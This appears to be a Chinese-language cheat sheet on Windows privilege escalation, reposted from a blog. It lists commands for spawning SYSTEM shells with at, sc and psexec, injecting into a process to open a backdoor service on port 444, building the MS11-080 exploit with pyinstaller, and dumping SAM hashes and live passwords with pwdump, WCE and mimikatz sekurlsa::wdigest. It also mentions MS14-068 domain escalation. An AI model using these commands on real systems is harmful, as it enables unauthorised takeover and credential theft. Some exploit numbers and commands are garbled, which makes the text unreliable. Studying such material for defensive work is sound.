提权

at  8:00 /interactive cmd.exe    以system用户打开cmd.exe

taskkill explorer

taskadd explorer   以system用户打开桌面

sc create syscmd binpath = "cmd /k start" type = own type = interact

sc start syscmd

net user administrator /active:yes

tools

https://docs.microsoft.com/zh-cn/sysinternals/

sysinternals工具包    Windows 大神: Mark Russinovich

psExec -i -s cmd.exe

pInjector.exe 注入工具

http://www.tarasco.org/security/Process_Injector

pInjector.exe -l

pinjector.exe -p 345 cmd.exe 444      #注入进程345,开启后门服务444 以system用户运行cmd.exe

普通用户提权system (利用系统漏洞)

searchsploit ms11-080

searchspoit -m  187176.py

pyinstaller

pywin32

py 转 exe

python pyinstaller.py --onefile 18176.py

187176.exe -O xp   

PwdDown获取sam哈希值

pwdDump -x 127.0.01pwdDump 127.0.0.1

破解sam哈希在线网站

http://www.objectif-securite.ch/ophcrack.php

WCE从内存中获取口令工具

另外pwddump.exe 和 wce 在kali的 /usr/share/windows/binary/  /usr/share/wce目录下有

wce-universal.exe -h

WCE会读取已经登录的用户密码

俄罗斯人写的工具mimikatz_trunk 柠檬

也可以可以获取账号密码

::  两个冒号查看帮助

privilege ::   查看privilege帮助

privilege::debug   提权到debug权限

sekurlsa::

sekurlsa:: wdigest  获取在线用户密码

ms14-068  普通用户提升至域管理员用户

dcpromo

原文地址:https://www.cnblogs.com/demonxian3/p/8191217.html